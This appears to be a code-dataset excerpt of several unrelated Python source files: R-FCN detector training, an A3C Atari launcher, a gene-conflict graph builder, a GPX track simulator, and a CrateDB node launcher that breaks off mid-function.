source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
train_rfcn_alt_opt_5stage.py
|
#!/usr/bin/env python
# --------------------------------------------------------
# R-FCN
# Copyright (c) 2016 Yuwen Xiong, Haozhi Qi
# Licensed under The MIT License [see LICENSE for details]
# --------------------------------------------------------
"""Train a R-FCN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("R-FCN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals, imdb_rpn_compute_stats
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import pickle
import shutil
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train a R-FCN network')
parser.add_argument('--gpu', dest='gpu_id',
help='GPU device id to use [0]',
default=0, type=int)
parser.add_argument('--net_name', dest='net_name',
help='network name (e.g., "ResNet-101")',
default=None, type=str)
parser.add_argument('--weights', dest='pretrained_model',
help='initialize with pretrained model weights',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file',
default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to train on',
default='voc_2007_trainval', type=str)
parser.add_argument('--imdb_test', dest='imdb_test_name',
help='dataset to test',
default='voc_2007_test', type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--model', dest='model_name',
help='folder name of model',
default=None, type=str)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def get_roidb(imdb_name, rpn_file=None):
imdb = get_imdb(imdb_name)
print('Loaded dataset `{:s}` for training'.format(imdb.name))
imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
print('Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD))
if rpn_file is not None:
imdb.config['rpn_file'] = rpn_file
roidb = get_training_roidb(imdb)
return roidb, imdb
def get_solvers(imdb_name, net_name, model_name):
# R-FCN Alternating Optimization
# Solver for each training stage
if imdb_name.startswith('coco'):
solvers = [[net_name, model_name, 'stage1_rpn_solver360k480k.pt'],
[net_name, model_name, 'stage1_rfcn_ohem_solver360k480k.pt'],
[net_name, model_name, 'stage2_rpn_solver360k480k.pt'],
[net_name, model_name, 'stage2_rfcn_ohem_solver360k480k.pt'],
[net_name, model_name, 'stage3_rpn_solver360k480k.pt']]
solvers = [os.path.join('.', 'models', 'coco', *s) for s in solvers]
# Iterations for each training stage
max_iters = [480000, 480000, 480000, 480000, 480000]
# Test prototxt for the RPN
rpn_test_prototxt = os.path.join(
'.', 'models', 'coco', net_name, model_name, 'rpn_test.pt')
else:
solvers = [[net_name, model_name, 'stage1_rpn_solver60k80k.pt'],
[net_name, model_name, 'stage1_rfcn_ohem_solver80k120k.pt'],
[net_name, model_name, 'stage2_rpn_solver60k80k.pt'],
[net_name, model_name, 'stage2_rfcn_ohem_solver80k120k.pt'],
[net_name, model_name, 'stage3_rpn_solver60k80k.pt']]
solvers = [os.path.join(cfg.MODELS_DIR, *s) for s in solvers]
# Iterations for each training stage
max_iters = [80000, 120000, 80000, 120000, 80000]
# Test prototxt for the RPN
rpn_test_prototxt = os.path.join(
cfg.MODELS_DIR, net_name, model_name, 'rpn_test.pt')
return solvers, max_iters, rpn_test_prototxt
def _init_caffe(cfg):
"""Initialize pycaffe in a training process.
"""
import caffe
# fix the random seeds (numpy and caffe) for reproducibility
np.random.seed(cfg.RNG_SEED)
caffe.set_random_seed(cfg.RNG_SEED)
# set up caffe
caffe.set_mode_gpu()
caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, output_cache=None):
"""Train a Region Proposal Network in a separate training process.
"""
# Not using any proposals, just ground-truth boxes
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to R-FCN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
print('Init model: {}'.format(init_model))
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name)
print('roidb len: {}'.format(len(roidb)))
output_dir = get_output_dir(imdb)
print('Output will be saved to `{:s}`'.format(output_dir))
final_caffemodel = os.path.join(output_dir, output_cache)
if os.path.exists(final_caffemodel):
queue.put({'model_path': final_caffemodel})
else:
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rpn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
shutil.copyfile(rpn_model_path, final_caffemodel)
queue.put({'model_path': final_caffemodel})
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
rpn_test_prototxt=None):
"""Use a trained RPN to generate proposals.
"""
cfg.TEST.RPN_PRE_NMS_TOP_N = 6000 # no pre NMS filtering
cfg.TEST.RPN_POST_NMS_TOP_N = 300 # limit top boxes after NMS
print('RPN model: {}'.format(rpn_model_path))
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
imdb = get_imdb(imdb_name)
print('Loaded dataset `{:s}` for proposal generation'.format(imdb.name))
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
output_dir = get_output_dir(imdb)
print('Output will be saved to `{:s}`'.format(output_dir))
rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
rpn_proposals_path = os.path.join(
output_dir, rpn_net_name + '_proposals.pkl')
# Generate proposals on the imdb
# Write proposals to disk and send the proposal file path through the
# multiprocessing queue
if not os.path.exists(rpn_proposals_path):
rpn_proposals = imdb_proposals(rpn_net, imdb)
with open(rpn_proposals_path, 'wb') as f:
pickle.dump(rpn_proposals, f, pickle.HIGHEST_PROTOCOL)
queue.put({'proposal_path': rpn_proposals_path})
print('Wrote RPN proposals to {}'.format(rpn_proposals_path))
def train_rfcn(queue=None, imdb_name=None, init_model=None, solver=None,
max_iters=None, cfg=None, rpn_file=None, output_cache=None):
"""Train a R-FCN using proposals generated by an RPN.
"""
cfg.TRAIN.HAS_RPN = False # not generating prosals on-the-fly
cfg.TRAIN.PROPOSAL_METHOD = 'rpn' # use pre-computed RPN proposals instead
cfg.TRAIN.IMS_PER_BATCH = 1
print('Init model: {}'.format(init_model))
print('RPN proposals: {}'.format(rpn_file))
print('Using config:')
pprint.pprint(cfg)
import caffe
_init_caffe(cfg)
roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
output_dir = get_output_dir(imdb)
print('Output will be saved to `{:s}`'.format(output_dir))
# Train R-FCN
# Send R-FCN model path over the multiprocessing queue
final_caffemodel = os.path.join(output_dir, output_cache)
if os.path.exists(final_caffemodel):
queue.put({'model_path': final_caffemodel})
else:
model_paths = train_net(solver, roidb, output_dir,
pretrained_model=init_model,
max_iters=max_iters)
# Cleanup all but the final model
for i in model_paths[:-1]:
os.remove(i)
rfcn_model_path = model_paths[-1]
# Send final model path through the multiprocessing queue
shutil.copyfile(rfcn_model_path, final_caffemodel)
queue.put({'model_path': final_caffemodel})
def rpn_compute_stats(queue=None, imdb_name=None, cfg=None, rpn_test_prototxt=None):
"""Compute mean stds for anchors
"""
cfg.TRAIN.HAS_RPN = True
cfg.TRAIN.BBOX_REG = False # applies only to R-FCN bbox regression
cfg.TRAIN.PROPOSAL_METHOD = 'gt'
cfg.TRAIN.IMS_PER_BATCH = 1
import caffe
_init_caffe(cfg)
# NOTE: the matlab implementation computes proposals on flipped images, too.
# We compute them on the image once and then flip the already computed
# proposals. This might cause a minor loss in mAP (less proposal jittering).
roidb, imdb = get_roidb(imdb_name)
print('Loaded dataset `{:s}` for proposal generation'.format(imdb.name))
mean_file = os.path.join(imdb.cache_path, imdb.name + '_means.npy')
std_file = os.path.join(imdb.cache_path, imdb.name + '_stds.npy')
if os.path.exists(mean_file) and os.path.exists(std_file):
means = np.load(mean_file)
stds = np.load(std_file)
else:
# Load RPN and configure output directory
rpn_net = caffe.Net(rpn_test_prototxt, caffe.TEST)
# Generate proposals on the imdb
print('start computing means/stds, it may take several minutes...')
if imdb_name.startswith('coco'):
means, stds = imdb_rpn_compute_stats(rpn_net, imdb, anchor_scales=(4, 8, 16, 32))
else:
means, stds = imdb_rpn_compute_stats(rpn_net, imdb, anchor_scales=(8, 16, 32))
np.save(mean_file, means)
np.save(std_file, stds)
queue.put({'means': means, 'stds': stds})
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
# --------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are
# discarded (e.g. "del net" in Python code). To work around this issue, each
# training stage is executed in a separate process using
# multiprocessing.Process.
# --------------------------------------------------------------------------
# queue for communicated results between processes
mp_queue = mp.Queue()
# solves, iters, etc. for each training stage
solvers, max_iters, rpn_test_prototxt = get_solvers(args.imdb_name, args.net_name, args.model_name)
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 0 RPN, compute normalization means and stds')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_compute_stats, kwargs=mp_kwargs)
p.start()
stage0_anchor_stats = mp_queue.get()
p.join()
cfg.TRAIN.RPN_NORMALIZE_MEANS = stage0_anchor_stats['means']
cfg.TRAIN.RPN_NORMALIZE_STDS = stage0_anchor_stats['stds']
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 1 RPN, init from ImageNet model')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[0],
max_iters=max_iters[0],
cfg=cfg,
output_cache='stage1_rpn_final.caffemodel')
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage1_out = mp_queue.get()
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 1 RPN, generate proposals')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage1_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 1 RPN, generate proposals')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_test_name,
rpn_model_path=str(rpn_stage1_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage1_out['test_proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 1 R-FCN using RPN proposals, init from ImageNet model')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[1],
max_iters=max_iters[1],
cfg=cfg,
rpn_file=rpn_stage1_out['proposal_path'],
output_cache='stage1_rfcn_final.caffemodel')
p = mp.Process(target=train_rfcn, kwargs=mp_kwargs)
p.start()
rfcn_stage1_out = mp_queue.get()
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 2 RPN, init from stage1 R-FCN model')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(rfcn_stage1_out['model_path']),
solver=solvers[2],
max_iters=max_iters[2],
cfg=cfg,
output_cache='stage2_rpn_final.caffemodel')
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage2_out = mp_queue.get()
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 2 RPN, generate proposals')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
rpn_model_path=str(rpn_stage2_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage2_out['proposal_path'] = mp_queue.get()['proposal_path']
p.join()
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_test_name,
rpn_model_path=str(rpn_stage2_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage2_out['test_proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 2 R-FCN using Stage-2 RPN proposals, init from ImageNet model')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=args.pretrained_model,
solver=solvers[3],
max_iters=max_iters[3],
cfg=cfg,
rpn_file=rpn_stage2_out['proposal_path'],
output_cache='stage2_rfcn_final.caffemodel')
p = mp.Process(target=train_rfcn, kwargs=mp_kwargs)
p.start()
rfcn_stage2_out = mp_queue.get()
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 3 RPN, init from stage1 R-FCN model')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
cfg.TRAIN.SNAPSHOT_INFIX = 'stage3'
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_name,
init_model=str(rfcn_stage2_out['model_path']),
solver=solvers[4],
max_iters=max_iters[4],
cfg=cfg,
output_cache='stage3_rpn_final.caffemodel')
p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
p.start()
rpn_stage3_out = mp_queue.get()
p.join()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Stage 3 RPN, generate test proposals only')
print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
mp_kwargs = dict(
queue=mp_queue,
imdb_name=args.imdb_test_name,
rpn_model_path=str(rpn_stage3_out['model_path']),
cfg=cfg,
rpn_test_prototxt=rpn_test_prototxt)
p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
p.start()
rpn_stage3_out['test_proposal_path'] = mp_queue.get()['proposal_path']
p.join()
print('Final model: {}'.format(str(rfcn_stage2_out['model_path'])))
print('Final RPN: {}'.format(str(rpn_stage3_out['test_proposal_path'])))
|
main.py
|
from __future__ import print_function, division
import os
os.environ["OMP_NUM_THREADS"] = "1"
import argparse
import torch
import torch.multiprocessing as mp
from environment import atari_env
from utils import read_config
from model import A3Clstm
from train import train
from test import test
from shared_optim import SharedRMSprop, SharedAdam
from torchsummary import summary
#from gym.configuration import undo_logger_setup
import time
#undo_logger_setup()
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument(
'--lr',
type=float,
default=0.0001,
metavar='LR',
help='learning rate (default: 0.0001)')
parser.add_argument(
'--gamma',
type=float,
default=0.99,
metavar='G',
help='discount factor for rewards (default: 0.99)')
parser.add_argument(
'--tau',
type=float,
default=1.00,
metavar='T',
help='parameter for GAE (default: 1.00)')
parser.add_argument(
'--seed',
type=int,
default=1,
metavar='S',
help='random seed (default: 1)')
parser.add_argument(
'--workers',
type=int,
default=32,
metavar='W',
help='how many training processes to use (default: 32)')
parser.add_argument(
'--num-steps',
type=int,
default=20,
metavar='NS',
help='number of forward steps in A3C (default: 20)')
parser.add_argument(
'--max-episode-length',
type=int,
default=10000,
metavar='M',
help='maximum length of an episode (default: 10000)')
parser.add_argument(
'--env',
default='Pong-v0',
metavar='ENV',
help='environment to train on (default: Pong-v0)')
parser.add_argument(
'--env-config',
default='config.json',
metavar='EC',
help='environment to crop and resize info (default: config.json)')
parser.add_argument(
'--shared-optimizer',
default=False,
metavar='SO',
help='use an optimizer without shared statistics.')
parser.add_argument(
'--load', default=False, metavar='L', help='load a trained model')
parser.add_argument(
'--save-max',
default=True,
metavar='SM',
help='Save model on every test run high score matched or bested')
parser.add_argument(
'--optimizer',
default='Adam',
metavar='OPT',
help='shares optimizer choice of Adam or RMSprop')
parser.add_argument(
'--load-model-dir',
default='trained_models/',
metavar='LMD',
help='folder to load trained models from')
parser.add_argument(
'--save-model-dir',
default='trained_models/',
metavar='SMD',
help='folder to save trained models')
parser.add_argument(
'--log-dir', default='logs/', metavar='LG', help='folder to save logs')
parser.add_argument(
'--gpu-ids',
type=int,
default=-1,
nargs='+',
help='GPUs to use [-1 CPU only] (default: -1)')
parser.add_argument(
'--amsgrad',
default=True,
metavar='AM',
help='Adam optimizer amsgrad parameter')
parser.add_argument(
'--skip-rate',
type=int,
default=4,
metavar='SR',
help='frame skip rate (default: 4)')
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
# Implemented multiprocessing using locks but was not beneficial. Hogwild
# training was far superior
if __name__ == '__main__':
args = parser.parse_args()
torch.manual_seed(args.seed)
if args.gpu_ids == -1:
args.gpu_ids = [-1]
else:
torch.cuda.manual_seed(args.seed)
mp.set_start_method('spawn')
setup_json = read_config(args.env_config)
env_conf = setup_json["Default"]
for i in setup_json.keys():
if i in args.env:
env_conf = setup_json[i]
env = atari_env(args.env, env_conf, args)
shared_model = A3Clstm(env.observation_space.shape[0],
env.action_space)
#summary(shared_model, (1, 80, 80))
if args.load:
saved_state = torch.load(
'{0}{1}.dat'.format(args.load_model_dir, args.env),
map_location=lambda storage, loc: storage)
shared_model.load_state_dict(saved_state)
shared_model.share_memory()
if args.shared_optimizer:
if args.optimizer == 'RMSprop':
optimizer = SharedRMSprop(shared_model.parameters(), lr=args.lr)
if args.optimizer == 'Adam':
optimizer = SharedAdam(
shared_model.parameters(), lr=args.lr, amsgrad=args.amsgrad)
optimizer.share_memory()
else:
optimizer = None
processes = []
p = mp.Process(target=test, args=(args, shared_model, env_conf))
p.start()
processes.append(p)
time.sleep(0.1)
for rank in range(0, args.workers):
p = mp.Process(
target=train, args=(rank, args, shared_model, optimizer, env_conf))
p.start()
processes.append(p)
time.sleep(0.1)
for p in processes:
time.sleep(0.1)
p.join()
|
conflictedARGsClass.py
|
import json
from pymongo import MongoClient
import sys
import requests
import json
import networkx as nx
# from rest.DataBaseInterface.DataBaseClass import DataBase
import threading
class ConflictedARGs():
def __init__(self, DataBase):
self.database = DataBase
self.table = 'master'
self.secondaryTable = 'conflicted_genes'
def run(self):
G = nx.DiGraph()
subtype = {}
for i in self.database.find(self.table, {}):
# make sure that the entry is not inspected. If it is already inspected, jump to the next gene.
# try:
# i['entry']['inspected']
# except:
# continue
try:
for j in i['besthit']['alignments']:
if j['bitscore'] < 50 or j['algn_len']/float(i['entry']['length']) < 0.9 or j['identity'] < 60: continue
if j['best_hit_database'] in ['CARD', 'ARDB']:
nodex = j['metadata']['subtype'].upper()
nodey = i['entry']['type']
else:
nodex = j['subtype'].upper()
nodey = i['entry']['type']
try:
G[nodex][nodey]['weight'] += 1
G[nodex][nodey]['gene_id'].append(i['entry']['gene_id'])
except:
G.add_edge(nodex, nodey, weight=1, gene_id=[i['entry']['gene_id']])
subtype[nodex] = True
except:
pass
# H=nx.DiGraph( [ (u,v,d) for u,v,d in G.edges(data=True) if d ['weight']>1] )
cg = [[i,G[i]] for i in subtype if len(G[i])>1]
stu = self.database.delete(self.secondaryTable, {})
for i in cg:
self.database.insert(
self.secondaryTable,
{
"subtype": i[0],
"conflict": [{"class":k, "genes":list(set(i[1][k]['gene_id']))} for k in i[1] ]
}
)
# return {"status": True}
def runBackground(self):
process = threading.Thread(target=self.run, args=())
process.start()
return {"status": True}
|
gpx_example.py
|
from ftssim import gpx
from threading import Thread
player = gpx.GpxPlayer('192.168.3.2', 'test_file.gpx', "A1_Walk", speed_kph=5, max_time_step_secs=4)
player2 = gpx.GpxPlayer('192.168.3.2', 'test.gpx', "A2_Walk", speed_kph=5, max_time_step_secs=4, repeated_objects=5)
# Setup A thread for each player
player_thread = Thread(target=player.play_gpx)
player2_thread = Thread(target=player2.play_gpx)
# Start each thread
player_thread.start()
player2_thread.start()
# Kick off player 2 with its repeated objects
player2.play_gpx_multiple()
def print_info(wnd, thread):
print(f"""
_________________________________________________
+ {wnd.callsign} is Running +
+ File: {wnd.filename} +
+ Process ID: {thread.native_id} +
+ UID: {wnd.uid} +
+ Server: {wnd.tak_server}:{wnd.tak_port} +
+ Speed: {wnd.speed_kph}Kph +
_________________________________________________""")
# Print out to the terminal useful information about wanderer
print_info(player, player_thread)
print_info(player2, player2_thread)
|
run_crate.py
|
import argh
import os
import json
import re
import subprocess
import tempfile
import sys
import shutil
import contextlib
import logging
import random
import time
import gzip
import io
import tarfile
import threading
import fnmatch
import socket
import ssl
import platform
from datetime import datetime
from hashlib import sha1
from pathlib import Path
from functools import partial
from itertools import cycle
from typing import Optional, Dict, Any, List, NamedTuple
from urllib.request import urlopen
from cr8.java_magic import find_java_home
from cr8.misc import parse_version, init_logging
from cr8.engine import DotDict
from cr8.exceptions import ArgumentError
log = logging.getLogger(__name__)
NO_SSL_VERIFY_CTX = ssl._create_unverified_context()
RELEASE_URL = 'https://cdn.crate.io/downloads/releases/crate-{version}.tar.gz'
RELEASE_PLATFORM_URL = 'https://cdn.crate.io/downloads/releases/cratedb/{arch}_{os}/crate-{version}.{extension}'
VERSION_RE = re.compile(r'^(\d+\.\d+\.\d+)$')
DYNAMIC_VERSION_RE = re.compile(r'^((\d+|x)\.(\d+|x)\.(\d+|x))$')
BRANCH_VERSION_RE = re.compile(r'^((\d+)\.(\d+))$')
FOLDER_VERSION_RE = re.compile(r'crate-(\d+\.\d+\.\d+)')
REPO_URL = 'https://github.com/crate/crate.git'
DEFAULT_SETTINGS = {
'discovery.initial_state_timeout': 0,
'network.host': '127.0.0.1',
'udc.enabled': False
}
class ReleaseUrlSegments(NamedTuple):
arch: str
os: str
extension: str
@classmethod
def create(cls):
extension = 'tar.gz'
if sys.platform.startswith('linux'):
os = 'linux'
elif sys.platform.startswith('win32'):
os = 'windows'
extension = 'zip'
elif sys.platform.startswith('darwin'):
os = 'mac'
else:
raise ValueError(f'Unsupported platform: {sys.platform}')
machine = platform.machine()
if machine.startswith('arm'):
arch = 'aarch64'
else:
arch = 'x64'
return ReleaseUrlSegments(arch=arch, os=os, extension=extension)
@property
def platform_key(self):
return f'{self.arch}_{self.os}'
def get_uri(self, version):
return RELEASE_PLATFORM_URL.format(
version=version,
os=self.os,
extension=self.extension,
arch=self.arch
)
def _format_cmd_option_legacy(k, v):
return '-Des.{0}={1}'.format(k, v)
def _format_cmd_option(k, v):
if isinstance(v, bool):
return '-C{0}={1}'.format(k, str(v).lower())
return '-C{0}={1}'.format(k, v)
def _extract_version(crate_dir) -> tuple:
m = FOLDER_VERSION_RE.findall(crate_dir)
if m:
return parse_version(m[0])
return (1, 0, 0)
class OutputMonitor:
def __init__(self):
self.consumers = []
def _consume(self, proc):
try:
for line in proc.stdout:
for consumer in self.consumers:
if callable(consumer):
consumer(line)
else:
consumer.send(line)
except Exception:
if proc.returncode is not None:
return
raise
def start(self, proc):
out_thread = threading.Thread(target=self._consume, args=(proc,))
out_thread.daemon = True
out_thread.start()
class Timeout:
def __init__(self, timeout, sleep=0.1):
self.start_time = time.time()
self.sleep = sleep
self._first_ok = True
self.timeout = timeout
def timeout_expired():
if self._first_ok:
self._first_ok = False
return False
now = time.time()
if (now - self.start_time) > self.timeout:
return True
if self.sleep:
time.sleep(self.sleep)
self._timeout_expired = timeout_expired
def __call__(self):
if self._timeout_expired():
raise TimeoutError()
return True
def wait_until(predicate, timeout=30):
"""Wait until predicate returns a truthy value or the timeout is reached.
>>> wait_until(lambda: True, timeout=10)
"""
not_expired = Timeout(timeout)
while not_expired():
r = predicate()
if r:
break
def _is_up(host: str, port: int):
try:
conn = _create_connection(host, port)
conn.close()
return True
except (socket.gaierror, ConnectionRefusedError):
return False
def _create_connection(host: str, port: int):
if host[0] == '[' and host[-1] == ']':
host = host[1:-1]
return socket.create_connection((host, port))
def _has_ssl(host: str, port: int):
try:
with NO_SSL_VERIFY_CTX.wrap_socket(_create_connection(host, port)) as s:
s.close()
return True
except (socket.gaierror, ssl.SSLError):
return False
def cluster_state_200(url):
try:
with urlopen(url, context=NO_SSL_VERIFY_CTX) as r:
p = json.loads(r.read().decode('utf-8'))
return int(p['status']) == 200
except Exception as e:
log.debug(e)
return False
def _get_settings(settings=None) -> Dict[str, Any]:
s = DEFAULT_SETTINGS.copy()
if settings:
s.update(settings)
return s
def _try_print_log(logfile):
try:
with open(logfile) as f:
for line in f:
log.error(line)
except Exception:
pass
def _ensure_running(proc):
result = proc.poll()
if result:
raise SystemExit('Process exited: ' + str(result))
return True
class CrateNode(contextlib.ExitStack):
"""Class that allows starting and stopping a Crate process
This is similar to the ``CrateLayer`` in ``crate.testing.layer``.
But additionaly it supports setting environment variables and it can infer
the port to which Crate binds by sniffing Crate's stdout.
Attributes:
http_url: The HTTP URL of the Crate process.
Only available after ``start()`` has been called.
process: The subprocess. Only available after ``start()`` has been called.
"""
def __init__(self,
crate_dir: str,
env: Dict[str, Any] = None,
settings: Dict[str, Any] = None,
keep_data: bool = False,
java_magic: bool = False,
version: tuple = None) -> None:
"""Create a CrateNode
Args:
crate_dir: Path to the extracted Crate tarball
env: Environment variables with which the Crate process will be
started.
settings: Additional Crate settings.
java_magic: If set to true, it will attempt to set JAVA_HOME to
some path that contains a Java version suited to run the given
CrateDB instance.
version:
The CrateDB version as tuple in the format (major, minor, hotfix).
This is usually inferred from the given `crate_dir`, but can be
passed explicitly to overrule the detection mechanism.
This argument is used to provide the right defaults and use the
right commandline argument syntax to launch CrateDB.
"""
super().__init__()
self.crate_dir = crate_dir
self.version = version or _extract_version(crate_dir)
self.env = env or {}
if java_magic:
java_home = find_java_home(self.version)
else:
java_home = os.environ.get('JAVA_HOME', '')
self.env.setdefault('JAVA_HOME', java_home)
self.env.setdefault('LANG',
os.environ.get('LANG', os.environ.get('LC_ALL')))
if not self.env['LANG']:
raise SystemExit('Your locale are not configured correctly. '
'Please set LANG or alternatively LC_ALL.')
self.monitor = OutputMonitor()
self.process = None # type: Optional[subprocess.Popen]
self.http_url = None # type: Optional[str]
self.http_host = None # type: Optional[str]
start_script = 'crate.bat' if sys.platform == 'win32' else 'crate'
settings = _get_settings(settings)
if self.version < (1, 1, 0):
settings.setdefault('discovery.zen.ping.multicast.enabled', False)
self.data_path = settings.get('path.data') or tempfile.mkdtemp()
self.logs_path = settings.get('path.logs') or os.path.join(crate_dir, 'logs')
self.cluster_name = settings.get('cluster.name') or 'cr8'
self.keep_data = keep_data
settings['path.data'] = self.data_path
settings['cluster.name'] = self.cluster_name
if self.version < (1, 0, 0):
_format_option = _format_cmd_option_legacy
else:
_format_option = _format_cmd_option
args = [_format_option(k, v) for k, v in settings.items()]
self.cmd = [
os.path.join(crate_dir, 'bin', start_script)] + args
def start(self):
"""Start the process.
This will block until the Crate cluster is ready to process requests.
"""
log.info('Starting Crate process')
self.process = proc = self.enter_context(subprocess.Popen(
self.cmd,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=self.env,
universal_newlines=True
))
msg = ('CrateDB launching:\n'
' PID: %s\n'
' Logs: %s\n'
' Data: %s')
if not self.keep_data:
msg += ' (removed on stop)\n'
logfile = os.path.join(self.logs_path, self.cluster_name + '.log')
log.info(
